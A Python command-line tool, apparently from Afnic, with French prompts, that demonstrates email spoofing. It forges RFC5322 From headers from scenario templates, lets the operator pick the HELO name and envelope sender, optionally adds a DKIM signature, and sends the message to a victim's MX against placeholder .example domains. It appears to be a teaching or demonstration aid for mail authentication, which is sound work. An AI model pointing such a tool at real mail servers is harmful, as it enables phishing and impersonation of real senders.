#!/usr/bin/env python3 # # SPDX-FileCopyrightText: 2023 Afnic # # SPDX-License-Identifier: GPL-3.0-or-later # from argparse import ArgumentParser from email.message import EmailMessage import email.utils import importlib.resources import json import pathlib import re import smtplib import sys import uuid import dkim from rich.console import Console import rich.highlighter import rich.panel from rich.prompt import Confirm, Prompt import rich.text from rich.theme import Theme import spoof_templates DEFAULT_HELO = "attaquant.example" ATTACKER_DOMAIN = "attaquant.example" ATTACKER_MAIL_FROM = "usurpateur@attaquant.example" VICTIM_NAME = "Destinataire" VICTIM_DOMAIN = "destinataire.example" VICTIM_MX = "mx.destinataire.example" VICTIM_ADDRESS = f"destinataire@{VICTIM_DOMAIN}" class SMTPHighlighter(rich.highlighter.Highlighter): patterns = { 'helo': r'(?:HELO|EHLO) (?P.*)', 'mail_from': r'MAIL FROM:<(?P.*?)>', 'rcpt_to': r'RCPT TO:<(?P.*)>', 'data': r'From: (?P.* <(?P.*)>)' } def __init__(self, **kwargs): super().__init__(**kwargs) self.state = 'connect' def highlight(self, text): if pattern := SMTPHighlighter.patterns.get(self.state, None): if mobj := re.match(pattern, text.plain): for style in mobj.groupdict().keys(): start, end = mobj.start(style), mobj.end(style) text.stylize(style, start, end) custom_theme = Theme({ "banner": "bold red", "incoming": "yellow", "outgoing": "cyan", "helo": "bold sea_green1", "mail_from": "bold underline sky_blue1", "rcpt_to": "bold underline pale_violet_red1", "data_from": "bold underline medium_purple1", "data_display_name": "medium_purple1", "comment": "#777777", "failure": "bold red", "success": "green", "text": "default" }) console = Console(highlighter=None, theme=custom_theme) class SMTP(smtplib.SMTP): def __init__(self, output, **kwargs): super().__init__(**kwargs) self.highlighter = SMTPHighlighter() self.log = []; self.output = output def trace(self, s, direction): if direction not in ['in', 'out']: raise ValueError("direction must be 'in' or 'out'") arrows = {'in': '[incoming]←[/]', 'out': '[outgoing]→[/]'} max_lines = 4 if isinstance(s, bytes): s = s.decode('utf-8') lines = [{'class': 'text', 'text': text} for text in s.splitlines()] # lines = [self.highlighter(rich.text.Text(line)) for line in s.splitlines()] if len(lines) > max_lines: suppressed_count = len(lines[max_lines:-1]) if suppressed_count > 1: suppressed_text = f"{suppressed_count} lignes omises" else: suppressed_text = f"{suppressed_count} ligne omise" suppressed_obj = {'class': 'comment', 'text': suppressed_text} lines = lines[:max_lines] + [suppressed_obj] + lines[-1:] # Print the text on the console if self.output: for i, l in enumerate(lines): prefix = arrows[direction] if i == 0 else " " console.print(f" {prefix} ", end=None) console.print(l['text'], style=l['class']) if direction == 'in': console.print() # Save it internally too self.log.append({'direction': direction, 'lines': lines}) def putcmd(self, cmd, args=''): super().putcmd(cmd.upper(), args) def send(self, s): self.trace(s, 'out') super().send(s) def getreply(self): errcode, errmsg = super().getreply() lines = errmsg.decode('us-ascii').splitlines() lines = [ f"{errcode}{' ' if i == len(lines) - 1 else '-'}{line}" for i, line in enumerate(lines) ] self.trace('\n'.join(lines), 'in') return errcode, errmsg def connect(self, *args, **kwargs): self.log.append({'direction': 'comment', 'lines': [{'class': 'comment', 'text': 'Connexion établie au serveur'}]}) return super().connect(*args, **kwargs) def ehlo(self, *args, **kwargs): self.highlighter.state = 'helo' return super().ehlo(*args, **kwargs) def mail(self, *args, **kwargs): self.highlighter.state = 'mail_from' return super().mail(*args, **kwargs) def rcpt(self, *args, **kwargs): self.highlighter.state = 'rcpt_to' return super().rcpt(*args, **kwargs) def data(self, *args): self.highlighter.state = 'data' return super().data(*args) def ask_helo(): response = Prompt.ask("Nom d’hôte dans le [helo]HELO[/helo]", console=console, default=DEFAULT_HELO) return response def ask_mail_from(default_mail_from): console.print("Adresse RFC5321.MailFrom :") console.print(f" 1. Utiliser le même que le RFC5322.From ([b]{default_mail_from}[/])") console.print(f" 2. Remplacer par une adresse qu’on maîtrise ([b]{ATTACKER_MAIL_FROM}[/])") console.print() choices = { 1: default_mail_from, 2: ATTACKER_MAIL_FROM } while True: try: response = Prompt.ask("Choix", console=console) result = choices[int(response)] console.print(f" ⇒ [mail_from]{result}[/]") return result except ValueError: pass except IndexError: pass def add_dkim_signature(email): if Confirm.ask("Ajouter une signature DKIM ?", choices="on", default=False): email_bytes = email.as_string().encode('utf-8') selector = Prompt.ask("Sélecteur") private_key = pathlib.Path(f"{selector}.private").read_bytes() selector = selector.encode('ascii') domain = Prompt.ask("Domaine", default=ATTACKER_DOMAIN).encode('ascii') signature_line = dkim.dkim_sign(email_bytes, selector, domain, private_key).decode('ascii') signature = re.match("^DKIM-Signature: (.*)\r\n", signature_line, re.DOTALL).group(1) console.print(" ⇒ Signature DKIM ajoutée") email['DKIM-Signature'] = signature else: console.print(" ⇒ Pas de signature DKIM") return email def generate_email(template): msg = template.msg msg['To'] = f"{VICTIM_NAME} <{VICTIM_ADDRESS}>" msg['Date'] = email.utils.formatdate() msg['Message-ID'] = f"{uuid.uuid4()}@{DEFAULT_HELO}" if not msg['Content-Type']: msg['Content-Type'] = "text/plain; charset=utf-8" return msg def ask_template(): templates = spoof_templates.spoof_templates() console.print("[bold]Sélectionner un scénario :[/]") for i, template in enumerate(templates): console.print(f"{i + 1:4}. {template.nice_name}") console.print() while True: try: response = Prompt.ask("Choix") result = templates[int(response) - 1] console.print(f" ⇒ [bold]{result.nice_name}[/]") console.print() return result except ValueError: pass except IndexError: pass def send_email(helo, envelope_from, email, output=True): data = email.as_string().encode('utf-8') with SMTP(local_hostname=helo, output=output) as smtp: try: smtp.connect(VICTIM_MX) smtp.sendmail(envelope_from, VICTIM_ADDRESS, data) return {'outcome': 'success', 'log': smtp.log} except smtplib.SMTPException: return {'outcome': 'failure', 'log': smtp.log} except: raise def interactive_main(): try: console.print( rich.panel.Panel( "🕱 Outil d’usurpation d’identité de courriel 🕱", style="banner", width=80)) console.print() template = ask_template() display_name, rfc5322from = re.match('(.*) <(.*)>', template.msg['From']).groups() console.print(f"Adresse RFC5322.From (tirée du scénario):") console.print(f" ⇒ [data_display_name]{display_name} <[data_from]{rfc5322from}[/data_from]>[/]") console.print() envelope_from = ask_mail_from(rfc5322from) console.print() helo = ask_helo() console.print() email = generate_email(template) signed_email = add_dkim_signature(email) results = send_email(helo, envelope_from, signed_email, output=True) if results['outcome'] == 'success': console.print(" [success]✔[/] Message [success]accepté[/] par le serveur SMTP") elif results['outcome'] == 'failure': console.print(" [failure]✘[/] Message [failure]rejeté[/] par le serveur SMTP") except KeyboardInterrupt: console.print() pass except: raise def main(): parser = ArgumentParser() parser.add_argument('--non-interactive', default=False, action='store_true') parser.add_argument('--get-config', default=False, action='store_true') parser.add_argument('--template') parser.add_argument('--replace-rfc5321-mail-from', default=False, action='store_true') parser.add_argument('--helo', default=DEFAULT_HELO) args = parser.parse_args() if args.non_interactive: if args.get_config: config = { 'default_helo': DEFAULT_HELO, 'my_mail_from': ATTACKER_MAIL_FROM, 'templates': [{'id': t.name, 'name': t.nice_name, 'from_name': re.match('(.*) <(.*)>', t.msg['From']).group(1), 'from_address': re.match('(.*) <(.*)>', t.msg['From']).group(2)} for t in spoof_templates.spoof_templates()] } print(json.dumps(config)) else: templates = {t.name: t for t in spoof_templates.spoof_templates()} template = templates[args.template] rfc5322from, = re.match('.* <(.*)>', template.msg['From']).groups() if args.replace_rfc5321_mail_from: envelope_from = ATTACKER_MAIL_FROM else: envelope_from = rfc5322from email = generate_email(template) results = send_email(args.helo, envelope_from, email, output=False) print(json.dumps(results)) else: interactive_main() if __name__ == '__main__': main()